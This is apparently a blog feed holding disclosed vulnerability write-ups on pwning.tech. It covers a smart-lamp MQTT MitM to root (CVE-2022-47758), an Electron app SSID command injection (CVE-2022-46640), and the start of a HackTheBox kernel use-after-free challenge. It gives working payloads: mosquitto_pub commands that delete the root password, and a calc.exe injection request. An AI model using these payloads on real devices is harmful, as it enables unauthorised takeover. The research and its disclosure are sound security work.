    // [snip] command-line argument parsing
  } while( true );
}

main() function - initializes the MQTT client channels

Client will publish firmware communications to [acme/device/serialno/update/client]
Client will receive firmware communications from [acme/device/serialno/update/server]
Client will publish debug communications to [acme/device/serialno/exec/client]
Client will receive debug communications from [acme/device/serialno/exec/server]
Client will publish health communications to [acme/device/serialno/uptime/client]
Client will receive health communications from [acme/device/serialno/uptime/server]

Communication channels used by MQTT client

We can see that cloud_pipe_start() (libcloudpipe.so) is called in main(), which registers several callback functions: cloud_pipe_start(..., ..., register_channels, on_disconnect_cb, on_tick_cb, ...). The function register_channels is a wrapper for registering handlers for the MQTT channels discussed above.

void register_channels(void)
{
  printlog(2,"Connection up\n");
  cloud_pipe_subscribe(&uptime_server,respond_healthcheck);
  cloud_pipe_subscribe(&update_server,update_firmware);
  cloud_pipe_subscribe(&exec_server,debug);
  return;
}

register_channels() - registers the MQTT message handlers per MQTT channel

The most interesting handler function sounds like debug, which handles messages on the channel /acme/device/serialno/exec/server. This function handles debug requests: it can execute a binary (debug a process) based on the MQTT request's parameters, or kill the process (stop the debugging). In order to start debugging a binary, we can publish the following to the server exec channel: debug /bin/echo "Hello World!", after which "Hello World!" should be nicely returned in an MQTT message on the channel /acme/device/serialno/exec/client. When we want to execute another binary or generally stop debugging, we can simply issue a stop command.
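Based on our reversing, the handler's command grammar is tiny. Here's a toy model of the semantics as we understood them (our own sketch in Python, not the vendor's code):

```python
def handle_exec_message(msg: str, state: dict) -> str:
    """Toy model of the 'debug'/'stop' grammar: one debugged process at a
    time, and 'stop' must be sent before debugging the next binary."""
    if msg == "stop":
        state["running"] = None
        return "stopped"
    if msg.startswith("debug "):
        if state.get("running"):
            return "error: already debugging, send 'stop' first"
        binary, *argv = msg[len("debug "):].split()
        state["running"] = (binary, argv)  # the real handler executes the binary
        return f"debugging {binary}"
    return "error: unknown command"

state = {}
print(handle_exec_message('debug /bin/echo Hello World!', state))  # debugging /bin/echo
print(handle_exec_message('stop', state))                          # stopped
```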

So far, I hope that the following part of the MQTT payload in the PoC exploit makes sense:

# create a file called /acme_config/ssh_enabled by 'debugging' /bin/touch
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /bin/touch /acme/ssh_enabled" --insecure --cafile /etc/mosquitto/certs/ca.crt

# stop debugging so we can execute another command
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "stop" --insecure --cafile /etc/mosquitto/certs/ca.crt

# delete (reset) the root password by 'debugging' /bin/passwd
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /bin/passwd -d root" --insecure --cafile /etc/mosquitto/certs/ca.crt

# stop debugging so we can execute another command
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "stop" --insecure --cafile /etc/mosquitto/certs/ca.crt

# reboot to start the OpenSSH server, but we can probably do it without reboot
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /sbin/reboot" --insecure --cafile /etc/mosquitto/certs/ca.crt

A rewind to the PoC exploit payload commands

Investigating the communication protocol

Now we have a primitive for our exploit: a debugging endpoint which could be abused if we could send messages on the /acme/device/serialno/exec/server channel of the MQTT broker. Mind you, it would cause CHAOS if this MQTT broker could be hacked to allow an attacker to send messages to all devices connected to it. Since hacking the vendor's official MQTT broker would be cybercrime, we weren't going to test it. Instead, we tried to find ways to MitM the traffic going to mqtt.acme.org, but we couldn't succeed since it used TLS... But - we asked ourselves - what if the TLS configuration was insecure? E.g. an insecure version?

In order to find the TLS configuration, we dug into the functions that were called to set up the MQTT client: cloud_pipe_subscribe and cloud_pipe_start. By running a simple grep -iRe 'cloud_pipe_subscribe' query again, we can see that our function originates from /acme_config/acme_programs/libcloudpipe.so.

$ grep -iRe 'cloud_pipe_subscribe'
grep: lib/libcloudpipe.so: binary file matches
grep: acme_config/acme_programs/cloud_daemon: binary file matches
grep: acme_config/acme_programs/libcloudpipe.so: binary file matches
grep: sbin/cloud_daemon: binary file matches

grep - utility for searching strings

An interesting part of the cloud_pipe_start() function is the subsystem where a TLS network connection gets initiated by ConnectNetwork() and the MQTT client gets initiated by MQTTClient(). We can find the TLS configuration in ConnectNetwork(), and I quickly identified the used TLS library as mbedtls. Whilst searching for documentation of the functions used from the mbedtls library, I found out that the parameter MBEDTLS_SSL_VERIFY_NONE gets passed to the configuration function mbedtls_ssl_conf_authmode. This means that TLS certificates are not validated...

  sprintf(port_str,"%d",port);
  printf("  . Connecting to %s:%s...",addr,port_str);
  fd_stdout = stdout;
  fflush(stdout);
  param1 = mbedtls_net_connect(&ctx_net,addr,port_str,0);
  if (param1 != 0) {
    printf(" failed\n  ! mbedtls_net_connect returned %d\n\n",param1);
    return -1;
  }
  puts(" ok");
  initiated_seed = 0;
  printf("  . Setting up the SSL/TLS structure...");
  fflush(fd_stdout);
  pcVar4 = (char *)0x0;
  pcVar3 = (code *)0x0;
  success = mbedtls_ssl_config_defaults((undefined4 *)&ssl_config,0,0,0);
  if ((int *)success == (int *)0x0) {
    puts(" ok");

    // mbedtls_ssl_conf_authmode() - Set the certificate verification mode
    // 
    // #define MBEDTLS_SSL_VERIFY_NONE 0
    mbedtls_ssl_conf_authmode((int)&ssl_config,0);
    mbedtls_ssl_conf_rng(ssl_config, mbedtls_ctr_drbg_random, &ctx_ctr_drbg_init);
    pcVar3 = (code *)fd_stdout;
    mbedtls_ssl_conf_dbg((int)&ssl_config,&LAB_0002d068,fd_stdout);
    success = mbedtls_ssl_setup((undefined4 *)&DAT_00100838,&ssl_config);

ConnectNetwork() - create the TLS connection to a server
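For intuition, passing MBEDTLS_SSL_VERIFY_NONE here is the moral equivalent of the following Python client configuration: any certificate, including our self-signed one, will be accepted.

```python
import ssl

# A client context that skips all certificate validation, mirroring
# mbedtls_ssl_conf_authmode(&ssl_config, MBEDTLS_SSL_VERIFY_NONE):
ctx = ssl.create_default_context()
ctx.check_hostname = False       # don't match the server hostname
ctx.verify_mode = ssl.CERT_NONE  # don't validate the certificate chain

# Any TLS server -- including our rogue broker with a self-signed
# certificate -- will now pass the handshake without complaint.
print(ctx.verify_mode == ssl.CERT_NONE)  # True
```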

We have the final piece.

Creating a Proof of Concept exploit

The primitives in our exploit are complete: we have a dangerous debugging endpoint listening to a server which can be eavesdropped. Now it's a matter of performing a Man-in-the-Middle (MitM) attack on the MQTT broker and creating a payload to send.

We have plenty of options to MitM network traffic when TLS certificates aren't verified, but our favorite approach is using a rogue DHCP server to serve fake DNS records. We picked the isc-dhcp-server DHCP service because it works on Linux and because it's very customizable. We're using option domain-name-servers to set the DNS server to 192.168.128.10 on the smart lamp. This means that if the lamp requests mqtt.acme.org, it will be resolved by our own DNS resolver over at 192.168.128.10.

We used bind9 as a DNS resolver in order to create fake DNS zones/records. We created a basic type A (IPv4) DNS record for mqtt.acme.org which redirects to our own MQTT broker at 192.168.128.10. Usually these kinds of attacks are prevented by the client verifying the TLS certificate of the broker, but the smart lamp did not perform those verification checks.

For the final service we needed an MQTT broker, for which we chose mosquitto. We hardly configured it and just made sure that it was possible to publish and subscribe to any MQTT channel. However, we had to make sure that our service was running on port 443 (which is typically used for HTTPS), that it supported TLS, and that anonymous logins were allowed (anonymous login means that any username/password combination can log in).

Now that we have our entire infrastructure up and running, we need to send the payload commands to our own MQTT broker. We can easily use the mosquitto_pub utility to publish our own messages to specific channels. Additionally, we can use the mosquitto_sub utility to subscribe to other channels so that we can receive stdout from the smart lamp. In order to easily get our very own OpenSSH server, we need to create a file called /acme_config/ssh_enabled and reboot. However, root is the only user with a default shell (/bin/ash) and we don't know its password.

$ cat etc/passwd
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false

/etc/passwd - contains user information

We can reset the root password using passwd -d, which empties the password, and OpenSSH will gladly accept that. This means that we can essentially start an OpenSSH server using touch /acme_config/ssh_enabled && passwd -d root && reboot. However, in practice our commands get executed using execv(char* filepath, char** argv). This means that we need to execute the commands separately with the full path. Hence, our payload is as follows:

$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /bin/touch /acme/ssh_enabled" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "stop" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /bin/passwd -d root" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "stop" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /sbin/reboot" --insecure --cafile /etc/mosquitto/certs/ca.crt

When we execute this, we start the OpenSSH server and we can log in as root:

$ ssh root@192.168.128.20

root@192.168.128.20:~$ whoami
root

Conclusion

As we have discovered in this article, a critical vulnerability was found in many, many IoT smart lighting devices, allowing attackers to gain control over the entire device and access sensitive information. This serves as a reminder of the importance of IoT security for both vendors and consumers.

As consumers, we can follow these best practices to enhance the security of our home network:

  1. Keep devices' software up-to-date to prevent vulnerabilities from being exploited.
  2. Keep smart devices on a separate sub-network to reduce privacy concerns.
  3. Use long passwords (even pass-sentences) and two-factor authentication where possible.
  4. Disable unused or unnecessary services and ports on devices.

As developers, we can implement the following best practices to ensure the security of our IoT devices:

  1. Conduct thorough security assessments and penetration testing to identify and fix vulnerabilities before deploying devices.
  2. Implement encryption and authentication mechanisms to secure data transmitted between the device and the server.
  3. Use secure coding practices and avoid insecure software libraries.
  4. Regularly update and patch devices to fix security vulnerabilities (and do it fast :-) ).

By following these best practices, we can reduce the risk of security breaches and ensure the safety and security of our connected devices and home networks.

Furthermore, the vulnerabilities in said smart lamps were patched by the vendor in early January 2023, about a month after coordinated vulnerability disclosure. The vendor gave us explicit permission to publish this blogpost - under the agreement we wouldn't mention the vendors name nor product name - and gave us permission to publish CVE-2022-47758.

We hope this blogpost has been as interesting to read for you as it was for us to write, and thank you for taking the time to read this blogpost.

Notselwyn, March 2023

]]>
<![CDATA[How I hacked IoT management apps: the story behind CVE-2022-46640]]>Have you ever wondered how secure desktop applications really are? Recently, we put one of them to the test and found some critical vulnerabilities such as unauthenticated Remote Code Execution (CVE-2022-46640), Local File Inclusion and Remote Wireless Reconfiguration which allowed us to remotely compromise the Windows desktop. In this blogpost,

]]>
https://pwning.tech/cve-2022-46640/658f44f8d32e980001de21f0Wed, 08 Mar 2023 07:30:00 GMTHave you ever wondered how secure desktop applications really are? Recently, we put one of them to the test and found some critical vulnerabilities such as unauthenticated Remote Code Execution (CVE-2022-46640), Local File Inclusion and Remote Wireless Reconfiguration which allowed us to remotely compromise the Windows desktop. In this blogpost, we're going to share our experience hacking into a desktop app with a very large number of downloads, and explain how we were able to do it. Whether you're a developer, a security researcher, or just someone curious about software security, you won't want to miss this interesting write-up. So, let's dive in!

Content

  1. Introduction to IoT desktop apps
  2. Proof of Concept exploit
  3. Analyzing the IoT desktop app
  4. Creating a Proof of Concept exploit
  5. Conclusion

Introduction to IoT desktop apps

Smart lighting has evolved beyond just mobile apps. With the rise of desktop apps, managing smart lights has become even more convenient. Desktop apps for smart lighting allow users to manage their smart lights from their computers, with some apps offering unique features like a more user-friendly interface or advanced automation options.

Desktop apps for smart lighting can pose security risks, including vulnerabilities that attackers could exploit to gain access to a user's smart lights and even the desktop itself. To minimize these risks, users should download apps from trusted sources and regularly update their apps and operating systems. Additionally, users can separate their IoT networks from their regular networks.

The desktop app we managed to exploit was written in Electron, with a back-end server written in Express.js. The back-end Express.js server was accessible from any device on the network, which meant that remote exploitation was possible.

Proof of Concept exploit

In order to exploit the command injection vulnerability (which leads to unauthenticated RCE), we can send a single HTTP request as Proof of Concept (PoC). The root cause is a command injection vulnerability in an unauthenticated Express.js API endpoint on the device that changes the active WiFi network. This "intended" WiFi reconfiguration functionality is itself a Remote Wireless Reconfiguration (RWR) vulnerability, because an attacker can set up their own malicious WiFi network and make the target device connect to it in order to eavesdrop on its traffic.

The code that causes this command injection vulnerability is located in the Windows WiFi network subsystem of the application. We can supply a malicious access point SSID in the HTTP request which allows us to inject our own commands into execCommand().

function connect(ap) { 
    console.log("using windows wifi handler");
    return scan().then((networks) => { ...
    }).then(() => {
        return execCommand('netsh wlan add profile filename="nodeWifiConnect.xml"');
    }).then(() => {
        return execCommand(`netsh wlan connect ssid="${ap.name}" name="${ap.name}"`);
    }).then(() => { ...
    }).catch((err) => {
        console.warn("windowsWifi connectToWifi Error:", err);
        return execCommand(`netsh wlan delete profile "${ap.name}"`).then(() => {
            return Promise.reject(err);
        });
    });
}
connect(ap) - the code that contains the command injection vulnerability

The payload in the malicious HTTP request is a JSON body including the new WiFi SSID and the new WiFi password. We can supply an SSID that escapes out of the command netsh wlan delete profile "${ap.name}" to exploit it. An example of such an SSID is {"name": "\"&calc.exe&::"} - in which & is used to background the command and :: to comment out everything that follows.

POST /validateWifiPassword HTTP/1.1
Host: target.local:56751
Content-Length: 75
Content-Type: application/json

{"new_network":{"name":"attacker_ssid","password":"attacker_pass"}}
HTTP request for the typical credential check
POST /validateWifiPassword HTTP/1.1
Host: target.local:56751
Content-Length: 75
Content-Type: application/json

{"new_network":{"name":"\"&calc.exe&::","password":"attacker_pass"}}
HTTP request containing our own payload which executes calc.exe

This proof of concept payload spawns the Windows calculator on the desktop of the vulnerable target device. According to our research, it is possible to build a fully fledged shell that can upload files, download files, and execute commands, all using native vulnerabilities we found in the app. Those vulnerabilities - LFI, LFW, et cetera - have been patched by the vendor as a result of our research as well.

Analyzing the IoT desktop app

In order to find vulnerabilities in the desktop app, we need to get our hands on the code. To find the relevant code, I searched the app directory for strings that are shown when running the app; even if the app were a compiled PE executable, this should still yield results. Using grep -iRe "Sign In" we found the file app.asar. An ASAR file turns out to be a source code package for an Electron app. We found the asar tool, developed by Electron themselves, and used it to extract the source code from the ASAR file using asar e app.asar out.

The first thing we researched when we got access to the source code was the entrypoint of the application. Since the project structure looked an awful lot like an Express.js webserver, we started looking for the initialization of the webserver to find the host, port and routes. It turns out that the port is provided in a configuration file, and that the app listens on port 56751 and binds to 0.0.0.0 (because no interface is provided).

The fact that the server binds to 0.0.0.0 is the root cause of all vulnerabilities listed in this blogpost. Because the server doesn't bind to just localhost (a.k.a. 127.0.0.1), any device on the network can connect to the webserver. This is fundamentally unnecessary for this usecase, and it makes exploitation possible from other devices. If the server bound to 127.0.0.1 instead, there would be no remote RCE, since remote devices wouldn't be able to communicate with the webserver.
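The difference between the two bind addresses can be demonstrated in a few lines of Python (a minimal sketch, not the app's code; the OS picks free ports here):

```python
import socket

# Binding to 127.0.0.1 makes the listener reachable from this host only;
# binding to 0.0.0.0 (INADDR_ANY) exposes it on every network interface.
loopback_only = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loopback_only.bind(("127.0.0.1", 0))   # local-only, like the mitigated setup
lo_addr = loopback_only.getsockname()[0]

all_interfaces = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
all_interfaces.bind(("0.0.0.0", 0))    # network-wide, like the vulnerable app
any_addr = all_interfaces.getsockname()[0]

print(lo_addr, any_addr)  # 127.0.0.1 0.0.0.0
loopback_only.close()
all_interfaces.close()
```

The vulnerable app effectively chose the second option for a server that only ever needed to talk to the local Electron front-end.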

  production: {
    env: 'production',
    root: rootPath,
    app: {
      name: 'device-monitor-server'
    },
    port: 56751,
    redis: {
        host: process.env.REDIS_ADDRESS,
        port: 6379
    }
  }
config/config.js - containing information about the environment

global.App = {
    app: app,
    env: env,
    server: http.createServer(app),
    config: require('./config/config'),
    port: require('./config/config').port,
    // ...
    start: function() {
        if (!this.started) {
            // ...
            this.server.listen(this.port)
            console.log("Operating System :", process.platform);
            console.log("Running App Version " + App.version + " on port " + App.port + " in " + App.env + " mode")
        }
    }
}
application.js - binding to 0.0.0.0:56751

Since we found out that the webserver binds to 0.0.0.0:56751, we can now start looking for API routes, since the Electron app uses those to manage the smart lights. After running a few grep queries for "routes", we found config/routes.js. This file contains more than 60 API routes, for actions ranging from managing the smart devices to changing WiFi settings on the host.

// ...

app.get('/network/info', EncryptionController.getCurrentNetworkInfo);
app.post('/network/reconnect', EncryptionController.reconnectToNetwork);
app.get('/wides', EncryptionController.getWifis);

app.post('/validateWifiPassword', EncryptionController.validateWifiPassword);

app.post('/wac/device', dnssdController.enableWACMode, EncryptionController.connectDeviceToNetwork, dnssdController.disableWACMode, dnssdController.getDevices);

// ...
config/routes.js - containing the routes of the app

We analysed nearly all 60 endpoints and found plenty of vulnerabilities - all of which can be exploited remotely because the server binds to 0.0.0.0. We started analysing the endpoints with a priority on dangerous endpoints - the endpoints which call command execution functions. We searched for those using grep -iRe "execCommand", which only returned app/utils/windowsWifi.js. Analysing this file revealed the following dangerous functions:

function execCommand(cmd) {
    return new Promise((resolve, reject) => {
        exec(cmd, env, (err, stdout, stderr) => { /* ... */ });
    });
}
execCommand - the primary dangerous function being used
function connect(ap) { 
    console.log("using windows wifi handler");
    return scan().then((networks) => { // ... 
    }).then(() => { // ...
    }).then(() => {
        return execCommand(`netsh wlan connect ssid="${ap.name}" name="${ap.name}"`);
    }).then(() => { // ...
    }).catch((err) => {
        console.warn("windowsWifi connectToWifi Error:", err);
        return execCommand(`netsh wlan delete profile "${ap.name}"`).then(() => { // ...
        });
    });
}
connect(ap) - the dangerous function containing the command injection

The function connect(ap) sticks out because it injects user input directly into a command that it executes. If we could set ap.name to "&calc&, we should be able to start calc.exe on the management desktop. In order to check whether we could control ap.name from a web request, we ran another grep query for connect and got results.

We found validateWifiPassword(req, res), which is the callback for app.post('/validateWifiPassword', ...). This function calls platformWifi.connect, in which platformWifi is a class dependent on the OS of the host. If the OS is Windows, it calls the vulnerable connect(ap) function above - otherwise it uses a secure version. This means that only Windows is vulnerable.

let platformWifi;

if (process.platform === 'win32') {
    // node-wifi does not work well for some operations on Windows, so import our own library for them
    platformWifi = require('../utils/windowsWifi');
} else {
    platformWifi = wifi;
}
platformWifi - the selected WiFi library
function validateWifiPassword(req, res) {
    const new_network = req.body.new_network;
    if (!new_network.name || !new_network.password) {
        // ...
    }
    console.log(`Checking wifi creds for ${new_network.name}...`);

    const callback = (err) => {
        // ...
    };

    let accessPoint = { name: new_network.name, password: new_network.password };
    platformWifi.connect(accessPoint, callback);
}
validateWifiPassword() - the API callback function

The validateWifiPassword() function takes the parameter new_network with subparameters name and password. These are passed directly into platformWifi.connect(accessPoint, callback), which means there's a command injection vulnerability, since we can supply an arbitrary SSID into the command netsh wlan connect ssid="${ap.name}".

Creating a Proof of Concept exploit

We now have a clear view of our exploitable primitive: command injection through an HTTP request sent to the API endpoint POST /validateWifiPassword, hosted on a webserver that binds to 0.0.0.0:56751. Let's go through it from start to finish.

We start the exploit by sending a request to the following Express.js API endpoint, which binds to 0.0.0.0:56751. The API endpoint triggers a call to EncryptionController.validateWifiPassword().

app.post('/validateWifiPassword', EncryptionController.validateWifiPassword);
The API endpoint registration including its callback function

The validateWifiPassword() function is a wrapper that validates the user input and handles the request output. The user input is expected in the HTTP body, in the form of new_network.name (the WiFi SSID) and new_network.password (the WiFi password). The easiest way to supply this is a JSON structure like {"new_network":{"name":"ABC","password":"XYZ"}}.

function validateWifiPassword(req, res) {
    const new_network = req.body.new_network;
    if (!new_network.name || !new_network.password) {
        console.error("Invalid request object.");
        return res.sendStatus(422);
    }
    console.log(`Checking wifi creds for ${new_network.name}...`);

    const callback = (err) => {
        if (err) {
            // ...
        }
        console.log("Successfully connected  to", new_network.name);
        return res.sendStatus(204);
    };

    let accessPoint = { name: new_network.name, password: new_network.password };
    platformWifi.connect(accessPoint, callback);
}
validateWifiPassword() - the IO wrapper around wifi.connect()

Next, the function windowsWifi.connect() gets called. This function calls the dangerous execCommand function several times with user-controllable input. Specifically, new_network.name gets used in the command injection. This means that we have to inject a payload as new_network.name to achieve RCE on the webserver host.

function connect(ap) { 
    console.log("using windows wifi handler");
    return scan().then((networks) => { ...
    }).then(() => {
        return execCommand('netsh wlan add profile filename="nodeWifiConnect.xml"');
    }).then(() => {
        return execCommand(`netsh wlan connect ssid="${ap.name}" name="${ap.name}"`);
    }).then(() => { ...
    }).catch((err) => {
        console.warn("windowsWifi connectToWifi Error:", err);
        return execCommand(`netsh wlan delete profile "${ap.name}"`).then(() => {
            return Promise.reject(err);
        });
    });
}
connect() - the function containing vulnerable code

We're dealing with the command netsh wlan connect ssid="${ap.name}" name="${ap.name}", and we control ${ap.name}. We want to execute the Windows calculator (calc.exe) to get a graphical proof of concept on the vulnerable device. To do this, we need to escape the quotes in the command and ignore the rest of it. The resulting command looks like netsh wlan connect ssid=""&calc.exe&::" name=""&calc.exe&::", where only netsh wlan connect ssid="" and calc.exe get executed, since :: turns the rest of the line into a comment. We use & to background each task, so netsh wlan connect ssid="" can fail in the background whilst calc.exe succeeds. This means that our SSID needs to be "&calc.exe&::. The entire HTTP request becomes the following.

POST /validateWifiPassword HTTP/1.1
Host: target.local:56751
content-type: application/json
Content-Length: 61

{"new_network":{"name":"\"&calc.exe&::","password":"xyz"}}
The PoC payload executing calc.exe on the target device
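To make the quoting concrete, the payload and the resulting command line can be sketched in a few lines of Python (build_payload and rendered_command are our own illustrative helpers, not part of the app):

```python
import json

def build_payload(ssid: str, password: str = "xyz") -> str:
    # JSON body expected by POST /validateWifiPassword
    return json.dumps({"new_network": {"name": ssid, "password": password}})

def rendered_command(ssid: str) -> str:
    # Mirrors the template string from windowsWifi.js:
    #   netsh wlan connect ssid="${ap.name}" name="${ap.name}"
    return f'netsh wlan connect ssid="{ssid}" name="{ssid}"'

ssid = '"&calc.exe&::'
body = build_payload(ssid)
cmd = rendered_command(ssid)
print(body)  # the HTTP body (JSON escapes the leading quote as \")
print(cmd)   # the line cmd.exe would see: the :: comments out the tail
```

Note how the SSID's leading quote closes ssid=", & backgrounds calc.exe, and :: comments out the remainder of the rendered command.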

Conclusion

In conclusion, we exploited a command injection vulnerability by sending an HTTP request to a remote, vulnerable Express.js API webserver that binds to all interfaces. Our internal research concluded that it's possible to build a fully fledged shell using the vulnerabilities in this app - one that could upload/download files and execute commands - which would make it ideal for attackers.

The mitigations for these vulnerabilities would be as follows: only bind to interfaces that need access (in this case 127.0.0.1) to prevent remote access altogether; sanitize user-controllable input (especially when executing commands); disable remote wireless reconfiguration altogether to prevent MitM attacks; and disable arbitrary file operations (i.e. reading and writing), as they only introduce vulnerabilities.

Going forward, we recommend users keep their software up-to-date, as vendors continuously release patches for vulnerabilities like those shown in this blogpost. Additionally, we recommend more advanced users run firewalls on their devices, which should deny incoming traffic by default, as that can prevent many vulnerabilities from being reachable.

Furthermore, the vulnerabilities in said desktop app were patched by the vendor in December 2022, a month after coordinated vulnerability disclosure (CVD). The vendor gave us explicit permission to publish this blogpost (under the agreement that we wouldn't mention the vendor's name nor the desktop app's name) and to publish CVE-2022-46640.

We hope you learned as much reading this blogpost as we did researching the vulnerabilities, and thank you for taking the time to read it.

Notselwyn, March 2023

]]>
<![CDATA[Knote (HackTheBox)]]>Heya infosec folks, in this write-up we will cover the Knote (kernel-note) kernel-pwn challenge on HackTheBox. We can trigger a local privilege escalation attack by exploiting a use-after-free bug. The description of the challenge is as follows:

Secure your secrets in the kernel space!

Summary

  • What are kernel modules?
  • How
]]>
https://pwning.tech/knote/658f44f8d32e980001de21edSun, 15 Jan 2023 23:21:55 GMTHeya infosec folks, in this write-up we will cover the Knote (kernel-note) kernel-pwn challenge on HackTheBox. We can trigger a local privilege escalation attack by exploiting a use-after-free bug. The description of the challenge is as follows:

Secure your secrets in the kernel space!

Summary

  • What are kernel modules?
  • How does this kernel CTF work?
  • Analyzing the kmodule
  • Finding primitives
  • Creating an exploit
  • Creating a real world version

What are kernel modules?

Linux kernel modules are a way to extend the Linux kernel in a hotswappable way. Kernel modules are also used for creating drivers, which is why it's useful to learn how to exploit them. Thankfully, you can use the same pwn / exploitation techniques in kernel modules as in the core Linux kernel.

Kernel modules (kmodules) can do a lot of things that the core kernel can do as well: manage a virtual filesystem such as /proc, manage task structs, et cetera. They can register a device file as well, which you can use to communicate with the kmodule using read(), write(), ioctl(), et cetera.

You can insert, list, and remove kernel modules by respectively using the binaries insmod, lsmod, and rmmod.

How do kernel pwn CTFs work?

The goal of most kernel pwn CTFs is a local privilege escalation exploit, in which a user becomes root in order to read a root-only flag file. Typically, you will be given 3 files:

  • qemu.sh: a Bash script that runs a QEMU command. QEMU (Quick EMUlator) is a FOSS instruction-set simulator which you can use to run custom Linux kernels with custom filesystems. It may sound like a VM, but it is not.
  • initramfs.cpio.gz / rootfs.img: the custom (compressed) filesystem to run QEMU with.
  • bzImage: the custom Linux kernel to run QEMU with.

Make sure to remove -no-kvm from qemu.sh, as it is meant for old versions of QEMU. Also note that there's no KASLR, no SMAP, no SMEP, etc.

#!/bin/bash

timeout --foreground 35 qemu-system-x86_64 -m 128M \
  -kernel ./bzImage \
  -append 'console=ttyS0 loglevel=3 oops=panic panic=1 nokaslr' \
  -monitor /dev/null \
  -initrd ./initramfs.cpio.gz \
  -cpu qemu64 \
  -smp cores=1 \
  -nographic

qemu.sh content

Now you might see that I use initramfs.cpio.gz instead of the rootfs.img which is supplied in the challenge. This is because I first extracted it using cpio -iF rootfs.img. After that, I used the following scripts to compress and decompress the resulting directory:

#!/bin/bash

if [ "$1" = "" ]; then
    echo "usage: $0 <initramfs.cpio.gz>";
else

    # Decompress a .cpio.gz packed file system
    mkdir initramfs
    pushd . && pushd initramfs
    cp ../$1 .
    gzip -dc $1 | cpio -idm &>/dev/null && rm $1
    popd
fi

decompress.sh

#!/bin/bash

# Compress initramfs with the included statically linked exploit
in=$1
out=$(echo $in | awk '{ print substr( $0, 1, length($0)-2 ) }')
musl-gcc $in -static -pie -s -O0 -fPIE -o $out || exit 255
mv $out initramfs
pushd . && pushd initramfs
find . -print0 | cpio --null --format=newc -o 2>/dev/null | gzip -9 > ../initramfs.cpio.gz
popd

compress.sh

So firstly I create an initramfs.cpio.gz for QEMU using ./compress.sh initramfs/exploit.c. Now, we can test QEMU by running ./qemu.sh:

sh: can't access tty; job control turned off
~ $ whoami
user
~ $

QEMU proof-of-concept (PoC)

Analyzing the kmodule

We are given the following C source code of the knote.ko kernel module:

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/uaccess.h>

#define DEVICE_NAME "knote"
#define CLASS_NAME "knote"

MODULE_AUTHOR("r4j");
MODULE_DESCRIPTION("Secure your secrets in the kernelspace");
MODULE_LICENSE("GPL");

static DEFINE_MUTEX(knote_ioctl_lock);
static long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg);

static int major;
static struct class *knote_class  = NULL;
static struct device *knote_device = NULL;
static struct file_operations knote_fops = {
    .unlocked_ioctl = knote_ioctl
};

struct knote {
    char *data;
    size_t len;
    void (*encrypt_func)(char *, size_t);
    void (*decrypt_func)(char *, size_t);
};

struct knote_user {
    unsigned long idx;
    char * data;
    size_t len;
};

enum knote_ioctl_cmd {
    KNOTE_CREATE = 0x1337,
    KNOTE_DELETE = 0x1338,
    KNOTE_READ = 0x1339,
    KNOTE_ENCRYPT = 0x133a,
    KNOTE_DECRYPT = 0x133b
};

struct knote *knotes[10];

void knote_encrypt(char * data, size_t len) {
    int i;
    for(i = 0; i < len; ++i)
        data[i] ^= 0xaa;
}

void knote_decrypt(char *data, size_t len) {
    knote_encrypt(data, len);
}

static long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
    mutex_lock(&knote_ioctl_lock);
    struct knote_user ku;
    if(copy_from_user(&ku, (void *)arg, sizeof(struct knote_user)))
        return -EFAULT;
    switch(cmd) {
        case KNOTE_CREATE:
            if(ku.len > 0x20 || ku.idx >= 10)
                return -EINVAL;
            char *data = kmalloc(ku.len, GFP_KERNEL);
            knotes[ku.idx] = kmalloc(sizeof(struct knote), GFP_KERNEL);
            if(data == NULL || knotes[ku.idx] == NULL) {
                mutex_unlock(&knote_ioctl_lock);
                return -ENOMEM;
            }

            knotes[ku.idx]->data = data;
            knotes[ku.idx]->len = ku.len;
            if(copy_from_user(knotes[ku.idx]->data, ku.data, ku.len)) {
                kfree(knotes[ku.idx]->data);
                kfree(knotes[ku.idx]);
                mutex_unlock(&knote_ioctl_lock);
                return -EFAULT;
            }
            knotes[ku.idx]->encrypt_func = knote_encrypt;
            knotes[ku.idx]->decrypt_func = knote_decrypt;
            break;
        case KNOTE_DELETE:
            if(ku.idx >= 10 || !knotes[ku.idx]) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            kfree(knotes[ku.idx]->data);
            kfree(knotes[ku.idx]);
            knotes[ku.idx] = NULL;
            break;
        case KNOTE_READ:
            if(ku.idx >= 10 || !knotes[ku.idx] || ku.len > knotes[ku.idx]->len) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            if(copy_to_user(ku.data, knotes[ku.idx]->data, ku.len)) {
                mutex_unlock(&knote_ioctl_lock);
                return -EFAULT;
            }
            break;
        case KNOTE_ENCRYPT:
            if(ku.idx >= 10 || !knotes[ku.idx]) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            knotes[ku.idx]->encrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
            break;
         case KNOTE_DECRYPT:
